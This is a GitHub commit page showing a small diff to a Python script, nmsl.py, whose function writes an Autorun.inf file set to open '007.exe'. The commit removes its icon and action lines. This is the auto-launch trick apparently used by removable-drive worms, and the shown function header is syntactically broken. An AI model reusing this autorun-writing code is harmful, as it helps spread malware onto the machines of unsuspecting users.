Skip to content

Commit 7360578

Browse files
authored
Update nmsl.py
1 parent 9f5c143 commit 7360578

File tree

1 file changed

+0
-2
lines changed

1 file changed

+0
-2
lines changed

nmsl.py

Lines changed: 0 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -10,8 +10,6 @@ def writeconfig:
1010
autorun='''
1111
[autorun]
1212
open=007.exe
13-
icon=007.exe
14-
action=walawalaningningwalaningning
1513
'''
1614
with open("Autorun.inf",'w') as loadautorun:
1715
loadautorun.write(autorun)

0 commit comments

Comments
 (0)